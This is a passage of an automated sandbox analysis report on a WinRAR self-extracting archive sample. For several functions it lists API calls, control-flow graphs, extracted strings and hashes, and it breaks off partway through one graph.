                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                • API String ID: 788466649-433059772
                • Opcode ID: f7771abca40057ea16a471ffb22f152a49a7107aa60eb260b25bac1d1487ca24
                • Instruction ID: 08c6bff0644763c94115c57ba0c4d33ed3a0f33a88e95417d9afa0efa292432a
                • Opcode Fuzzy Hash: f7771abca40057ea16a471ffb22f152a49a7107aa60eb260b25bac1d1487ca24
                • Instruction Fuzzy Hash: 85619F71900341AFE320BBA9EC49F6B7BACFB45741F040529F545D2292EB78DD04CBA2
                Function 00889E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 770 889e1c-889e38 FindResourceW 771 889e3e-889e50 SizeofResource 770->771 772 889f2f-889f32 770->772 773 889e70-889e72 771->773 774 889e52-889e61 LoadResource 771->774 776 889f2e 773->776 774->773 775 889e63-889e6e LockResource 774->775 775->773 777 889e77-889e8c GlobalAlloc 775->777 776->772 778 889f28-889f2d 777->778 779 889e92-889e9b GlobalLock 777->779 778->776 780 889f21-889f22 GlobalFree 779->780 781 889ea1-889ebf call 88f4b0 779->781 780->778 785 889f1a-889f1b GlobalUnlock 781->785 786 889ec1-889ee3 call 889d7b 781->786 785->780 786->785 791 889ee5-889eed 786->791 792 889f08-889f16 791->792 793 889eef-889f03 GdipCreateHBITMAPFromBitmap 791->793 792->785 793->792 794 889f05 793->794 794->792
                APIs
                • FindResourceW.KERNEL32(0088AE4D,PNG,?,?,?,0088AE4D,00000066), ref: 00889E2E
                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0088AE4D,00000066), ref: 00889E46
                • LoadResource.KERNEL32(00000000,?,?,?,0088AE4D,00000066), ref: 00889E59
                • LockResource.KERNEL32(00000000,?,?,?,0088AE4D,00000066), ref: 00889E64
                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0088AE4D,00000066), ref: 00889E82
                • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0088AE4D,00000066), ref: 00889E93
                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00889EFC
                • GlobalUnlock.KERNEL32(00000000), ref: 00889F1B
                • GlobalFree.KERNEL32(00000000), ref: 00889F22
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                • String ID: PNG
                • API String ID: 4097654274-364855578
                • Opcode ID: e6b3c3535e40756e1ecd2415ac5665592d6bc4b3c4c7c6cb2e371914960286e2
                • Instruction ID: 3291de61b0ac98f894b173455f6248f5807f6888e4b1a3c05779f0b5effe6f82
                • Opcode Fuzzy Hash: e6b3c3535e40756e1ecd2415ac5665592d6bc4b3c4c7c6cb2e371914960286e2
                • Instruction Fuzzy Hash: 2D319171204706AFD711AF61EC48A2BBFADFF86751B080629F946D2260EB71DC00CBA1
                Function 0087A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 967 87a5f4-87a61f call 88e360 970 87a691-87a69a FindNextFileW 967->970 971 87a621-87a632 FindFirstFileW 967->971 972 87a6b0-87a6b2 970->972 973 87a69c-87a6aa GetLastError 970->973 974 87a6b8-87a75c call 87fe56 call 87bcfb call 880e19 * 3 971->974 975 87a638-87a64f call 87b66c 971->975 972->974 976 87a761-87a774 972->976 973->972 974->976 982 87a651-87a668 FindFirstFileW 975->982 983 87a66a-87a673 GetLastError 975->983 982->974 982->983 984 87a675-87a678 983->984 985 87a684 983->985 984->985 987 87a67a-87a67d 984->987 988 87a686-87a68c 985->988 987->985 990 87a67f-87a682 987->990 988->976 990->988
                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0087A4EF,000000FF,?,?), ref: 0087A628
                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0087A4EF,000000FF,?,?), ref: 0087A65E
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0087A4EF,000000FF,?,?), ref: 0087A66A
                • FindNextFileW.KERNEL32(?,?,?,?,?,?,0087A4EF,000000FF,?,?), ref: 0087A692
                • GetLastError.KERNEL32(?,?,?,?,0087A4EF,000000FF,?,?), ref: 0087A69E
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FileFind$ErrorFirstLast$Next
                • String ID:
                • API String ID: 869497890-0
                • Opcode ID: 483c579b994f5a628afa858fd9f4e4d293f7989751e3dc7ce8a9cb0667de9a8f
                • Instruction ID: 5203b72199b672506d29d5cf7a3f725c35542518544535416c9bf9137a8cc6cd
                • Opcode Fuzzy Hash: 483c579b994f5a628afa858fd9f4e4d293f7989751e3dc7ce8a9cb0667de9a8f
                • Instruction Fuzzy Hash: 39417E72504645AFC324EF68C884ADEF7E8FB99344F044A2AF59DD3200E774E9588B92
                Function 0089753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(00000000,?,00897513,00000000,008ABAD8,0000000C,0089766A,00000000,00000002,00000000), ref: 0089755E
                • TerminateProcess.KERNEL32(00000000,?,00897513,00000000,008ABAD8,0000000C,0089766A,00000000,00000002,00000000), ref: 00897565
                • ExitProcess.KERNEL32 ref: 00897577
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 988f1a2fd21c3ef368fcfeded4f4c4b4e623911316081ad303de35f81ee6d1b9
                • Instruction ID: 1f6873144a37222e87ac61869d69bf1564b6ff7848c629dae6140dfb5b9ba2bc
                • Opcode Fuzzy Hash: 988f1a2fd21c3ef368fcfeded4f4c4b4e623911316081ad303de35f81ee6d1b9
                • Instruction Fuzzy Hash: BDE04631010908ABDF11BF28CD09A483B29FB02341F098024F9058A622CB35DE42CA81
                Function 0087857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID:
                • API String ID: 3004599000-0
                • Opcode ID: e2510a0395162fdbf56439fb2f6999ae0d267dfa98b29dc72f35a78ac78cfa65
                • Instruction ID: 9aee37a02e4dde5f02f94459318fd121d3da66abe426b227d66b7802fec95c90
                • Opcode Fuzzy Hash: e2510a0395162fdbf56439fb2f6999ae0d267dfa98b29dc72f35a78ac78cfa65
                • Instruction Fuzzy Hash: 6A820871904145EEDF25DB64C889BFABBA9FF15304F08C0B9E89DDB14ADB20DA44CB61
                Function 0088AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 0088AEE5
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prologItemTextWindow
                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                • API String ID: 810644672-3617005944
                • Opcode ID: 2fa7d972dbf15b65805e547c9f3bd2a3ca4be2ab2bbd40e8d3cb8ad2d5293f53
                • Instruction ID: 2c77d5b080a8561c8b261330215c9a44e5eb43d943938326f4cc91bcd3048347
                • Opcode Fuzzy Hash: 2fa7d972dbf15b65805e547c9f3bd2a3ca4be2ab2bbd40e8d3cb8ad2d5293f53
                • Instruction Fuzzy Hash: C942E070944244BEEB21BBA49C8AFBE7B7CFB52704F004265F245E61D2CB789D44CB26
                Function 008800CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 257 8800cf-8800ee call 88e360 GetModuleHandleW 260 8800f0-880107 GetProcAddress 257->260 261 880154-8803b2 257->261 264 880109-88011f 260->264 265 880121-880131 GetProcAddress 260->265 262 8803b8-8803c3 call 8970dd 261->262 263 880484-8804b3 GetModuleFileNameW call 87bc85 call 87fe56 261->263 262->263 274 8803c9-8803fa GetModuleFileNameW CreateFileW 262->274 279 8804b5-8804bf call 87acf5 263->279 264->265 265->261 266 880133-880152 265->266 266->261 276 880478-88047f CloseHandle 274->276 277 8803fc-88040a SetFilePointer 274->277 276->263 277->276 280 88040c-880429 ReadFile 277->280 286 8804cc 279->286 287 8804c1-8804c5 call 880085 279->287 280->276 282 88042b-880450 280->282 284 88046d-880476 call 87fbd8 282->284 284->276 294 880452-88046c call 880085 284->294 288 8804ce-8804d0 286->288 291 8804ca 287->291 292 8804f2-880518 call 87bcfb GetFileAttributesW 288->292 293 8804d2-8804f0 CompareStringW 288->293 291->288 296 88051a-88051e 292->296 301 880522 292->301 293->292 293->296 294->284 296->279 300 880520 296->300 302 880526-880528 300->302 301->302 303 88052a 302->303 304 880560-880562 302->304 307 88052c-880552 call 87bcfb GetFileAttributesW 303->307 305 880568-88057f call 87bccf call 87acf5 304->305 306 88066f-880679 304->306 317 880581-8805e2 call 880085 * 2 call 87ddd1 call 87400a call 87ddd1 call 889f35 305->317 318 8805e7-88061a call 87400a AllocConsole 305->318 313 88055c 307->313 314 880554-880558 307->314 313->304 314->307 315 88055a 314->315 315->304 324 880667-880669 ExitProcess 317->324 323 88061c-880661 GetCurrentProcessId AttachConsole call 8935b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->323 318->324 323->324
                APIs
                • GetModuleHandleW.KERNEL32(kernel32), ref: 008800E4
                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008800F6
                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00880127
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008803D4
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008803F0
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00880402
                • ReadFile.KERNEL32(00000000,?,00007FFE,008A3BA4,00000000), ref: 00880421
                • CloseHandle.KERNEL32(00000000), ref: 00880479
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0088048F
                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 008804E7
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00880510
                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0088054A
                  • Part of subcall function 00880085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008800A0
                  • Part of subcall function 00880085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087EB86,Crypt32.dll,00000000,0087EC0A,?,?,0087EBEC,?,?,?), ref: 008800C2
                • _swprintf.LIBCMT ref: 008805BE
                • _swprintf.LIBCMT ref: 0088060A
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                • AllocConsole.KERNEL32 ref: 00880612
                • GetCurrentProcessId.KERNEL32 ref: 0088061C
                • AttachConsole.KERNEL32(00000000), ref: 00880623
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00880649
                • WriteConsoleW.KERNEL32(00000000), ref: 00880650
                • Sleep.KERNEL32(00002710), ref: 0088065B
                • FreeConsole.KERNEL32 ref: 00880661
                • ExitProcess.KERNEL32 ref: 00880669
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                • API String ID: 1201351596-3298887752
                • Opcode ID: e8fe367257bc1ed9c0aaa531334018adeef17240ad646c7bcd52888576528780
                • Instruction ID: 06a97945c3ccfe63b50bb19bb101b5f79908c8f702aa3d8467f3b813049a3254
                • Opcode Fuzzy Hash: e8fe367257bc1ed9c0aaa531334018adeef17240ad646c7bcd52888576528780
                • Instruction Fuzzy Hash: 1DD186B1548744ABE770AF94D849B9FBAE8FB86704F00491CF799D6940DBB0860C8F63
                Function 0088BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 406 88bdf5-88be0d call 88e28c call 88e360 411 88ca90-88ca9d 406->411 412 88be13-88be3d call 88aa36 406->412 412->411 415 88be43-88be48 412->415 416 88be49-88be57 415->416 417 88be58-88be6d call 88a6c7 416->417 420 88be6f 417->420 421 88be71-88be86 call 8817ac 420->421 424 88be88-88be8c 421->424 425 88be93-88be96 421->425 424->421 426 88be8e 424->426 427 88ca5c-88ca87 call 88aa36 425->427 428 88be9c 425->428 426->427 427->416 443 88ca8d-88ca8f 427->443 429 88c132-88c134 428->429 430 88bea3-88bea6 428->430 431 88c074-88c076 428->431 432 88c115-88c117 428->432 429->427 435 88c13a-88c141 429->435 430->427 437 88beac-88bf06 call 889da4 call 87b965 call 87a49d call 87a5d7 call 8770bf 430->437 431->427 436 88c07c-88c088 431->436 432->427 434 88c11d-88c12d SetWindowTextW 432->434 434->427 435->427 439 88c147-88c160 435->439 440 88c08a-88c09b call 897168 436->440 441 88c09c-88c0a1 436->441 495 88c045-88c05a call 87a52a 437->495 446 88c168-88c176 call 8935b3 439->446 447 88c162 439->447 440->441 444 88c0ab-88c0b6 call 88ab9a 441->444 445 88c0a3-88c0a9 441->445 443->411 451 88c0bb-88c0bd 444->451 445->451 446->427 460 88c17c-88c185 446->460 447->446 457 88c0c8-88c0e8 call 8935b3 call 8935de 451->457 458 88c0bf-88c0c6 call 8935b3 451->458 483 88c0ea-88c0f1 457->483 484 88c101-88c103 457->484 458->457 464 88c1ae-88c1b1 460->464 465 88c187-88c18b 460->465 471 88c296-88c2a4 call 87fe56 464->471 472 88c1b7-88c1ba 464->472 465->464 469 88c18d-88c195 465->469 469->427 475 88c19b-88c1a9 call 87fe56 469->475 485 88c2a6-88c2ba call 8917cb 471->485 477 88c1bc-88c1c1 472->477 478 88c1c7-88c1e2 472->478 475->485 477->471 477->478 496 88c22c-88c233 478->496 497 88c1e4-88c21e 478->497 490 88c0f8-88c100 call 897168 483->490 491 88c0f3-88c0f5 483->491 484->427 486 88c109-88c110 call 8935ce 484->486 505 88c2bc-88c2c0 485->505 506 88c2c7-88c318 call 87fe56 call 88a8d0 GetDlgItem SetWindowTextW SendMessageW call 8935e9 485->506 486->427 490->484 491->490 512 88bf0b-88bf1f SetFileAttributesW 495->512 513 88c060-88c06f call 87a4b3 495->513 499 88c261-88c284 call 8935b3 * 2 496->499 500 88c235-88c24d call 8935b3 496->500 523 88c220 497->523 524 88c222-88c224 497->524 499->485 534 88c286-88c294 call 87fe2e 499->534 500->499 517 88c24f-88c25c call 87fe2e 500->517 505->506 511 88c2c2-88c2c4 505->511 542 88c31d-88c321 506->542 511->506 518 88bfc5-88bfd5 GetFileAttributesW 512->518 519 88bf25-88bf58 call 87b4f7 call 87b207 call 8935b3 512->519 513->427 517->499 518->495 529 88bfd7-88bfe6 DeleteFileW 518->529 549 88bf5a-88bf69 call 8935b3 519->549 550 88bf6b-88bf79 call 87b925 519->550 523->524 524->496 529->495 533 88bfe8-88bfeb 529->533 537 88bfef-88c01b call 87400a GetFileAttributesW 533->537 534->485 546 88bfed-88bfee 537->546 547 88c01d-88c033 MoveFileW 537->547 542->427 543 88c327-88c33b SendMessageW 542->543 543->427 546->537 547->495 551 88c035-88c03f MoveFileExW 547->551 549->550 556 88bf7f-88bfbe call 8935b3 call 88f350 549->556 550->513 550->556 551->495 556->518
                APIs
                • __EH_prolog.LIBCMT ref: 0088BDFA
                  • Part of subcall function 0088AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0088AAFE
                • SetWindowTextW.USER32(?,?), ref: 0088C127
                • _wcsrchr.LIBVCRUNTIME ref: 0088C2B1
                • GetDlgItem.USER32(?,00000066), ref: 0088C2EC
                • SetWindowTextW.USER32(00000000,?), ref: 0088C2FC
                • SendMessageW.USER32(00000000,00000143,00000000,008BA472), ref: 0088C30A
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0088C335
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                • API String ID: 3564274579-312220925
                • Opcode ID: 54643e6b22df5364499fa4fa1632100fa797f286257682be64858505d2b641b1
                • Instruction ID: 95706bde92148689b8aaed3a2a38bc20dca91e2976b07917359b169937388c0e
                • Opcode Fuzzy Hash: 54643e6b22df5364499fa4fa1632100fa797f286257682be64858505d2b641b1
                • Instruction Fuzzy Hash: 03E16F72D00628AADF25EBA4DC45EEF777CFF18310F0440A6F609E3195EB749A848B61
                Function 0087D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 561 87d341-87d378 call 88e28c call 88e360 call 8915e8 568 87d3ab-87d3b4 call 87fe56 561->568 569 87d37a-87d3a9 GetModuleFileNameW call 87bc85 call 87fe2e 561->569 573 87d3b9-87d3dd call 879619 call 8799b0 568->573 569->573 580 87d3e3-87d3eb 573->580 581 87d7a0-87d7a6 call 879653 573->581 583 87d3ed-87d405 call 883781 * 2 580->583 584 87d409-87d438 call 895a90 * 2 580->584 585 87d7ab-87d7bb 581->585 594 87d407 583->594 595 87d43b-87d43e 584->595 594->584 596 87d444-87d44a call 879e40 595->596 597 87d56c-87d58f call 879d30 call 8935d3 595->597 601 87d44f-87d476 call 879bf0 596->601 597->581 606 87d595-87d5b0 call 879bf0 597->606 607 87d535-87d538 601->607 608 87d47c-87d484 601->608 620 87d5b2-87d5b7 606->620 621 87d5b9-87d5cc call 8935d3 606->621 612 87d53b-87d55d call 879d30 607->612 610 87d486-87d48e 608->610 611 87d4af-87d4ba 608->611 610->611 614 87d490-87d4aa call 895ec0 610->614 615 87d4e5-87d4ed 611->615 616 87d4bc-87d4c8 611->616 612->595 631 87d563-87d566 612->631 636 87d4ac 614->636 637 87d52b-87d533 614->637 618 87d4ef-87d4f7 615->618 619 87d519-87d51d 615->619 616->615 623 87d4ca-87d4cf 616->623 618->619 625 87d4f9-87d513 call 895ec0 618->625 619->607 626 87d51f-87d522 619->626 627 87d5f1-87d5f8 620->627 621->581 642 87d5d2-87d5ee call 88137a call 8935ce 621->642 623->615 630 87d4d1-87d4e3 call 895808 623->630 625->581 625->619 626->608 632 87d5fc-87d625 call 87fdfb call 8935d3 627->632 633 87d5fa 627->633 630->615 643 87d527 630->643 631->581 631->597 650 87d627-87d62e call 8935ce 632->650 651 87d633-87d649 632->651 633->632 636->611 637->612 642->627 643->637 650->581 654 87d731-87d757 call 87ce72 call 8935ce * 2 651->654 655 87d64f-87d65d 651->655 691 87d771-87d79d call 895a90 * 2 654->691 692 87d759-87d76f call 883781 * 2 654->692 658 87d664-87d669 655->658 660 87d66f-87d678 658->660 661 87d97c-87d984 658->661 665 87d684-87d68b 660->665 666 87d67a-87d67e 660->666 662 87d72b-87d72e 661->662 663 87d98a-87d98e 661->663 662->654 669 87d990-87d996 663->669 670 87d9de-87d9e4 663->670 667 87d691-87d6b6 665->667 668 87d880-87d891 call 87fcbf 665->668 666->661 666->665 672 87d6b9-87d6de call 8935b3 call 895808 667->672 693 87d897-87d8c0 call 87fe56 call 895885 668->693 694 87d976-87d979 668->694 673 87d722-87d725 669->673 674 87d99c-87d9a3 669->674 677 87d9e6-87d9ec 670->677 678 87da0a-87da2a call 87ce72 670->678 709 87d6f6 672->709 710 87d6e0-87d6ea 672->710 673->658 673->662 681 87d9a5-87d9a8 674->681 682 87d9ca 674->682 677->678 679 87d9ee-87d9f4 677->679 696 87da02-87da05 678->696 679->673 686 87d9fa-87da01 679->686 688 87d9c6-87d9c8 681->688 689 87d9aa-87d9ad 681->689 695 87d9cc-87d9d9 682->695 686->696 688->695 698 87d9c2-87d9c4 689->698 699 87d9af-87d9b2 689->699 691->581 692->691 693->694 721 87d8c6-87d93c call 881596 call 87fdfb call 87fdd4 call 87fdfb call 8958d9 693->721 694->661 695->673 698->695 704 87d9b4-87d9b8 699->704 705 87d9be-87d9c0 699->705 704->679 711 87d9ba-87d9bc 704->711 705->695 717 87d6f9-87d6fd 709->717 710->709 716 87d6ec-87d6f4 710->716 711->695 716->717 717->672 720 87d6ff-87d706 717->720 723 87d7be-87d7c1 720->723 724 87d70c-87d71a call 87fdfb 720->724 754 87d93e-87d947 721->754 755 87d94a-87d95f 721->755 723->668 726 87d7c7-87d7ce 723->726 731 87d71f 724->731 729 87d7d6-87d7d7 726->729 730 87d7d0-87d7d4 726->730 729->726 730->729 733 87d7d9-87d7e7 730->733 731->673 735 87d7e9-87d7ec 733->735 736 87d808-87d830 call 881596 733->736 738 87d805 735->738 739 87d7ee-87d803 735->739 744 87d853-87d85b 736->744 745 87d832-87d84e call 8935e9 736->745 738->736 739->735 739->738 747 87d862-87d87b call 87dd6b 744->747 748 87d85d 744->748 745->731 747->731 748->747 754->755 756 87d960-87d967 755->756 757 87d973-87d974 756->757 758 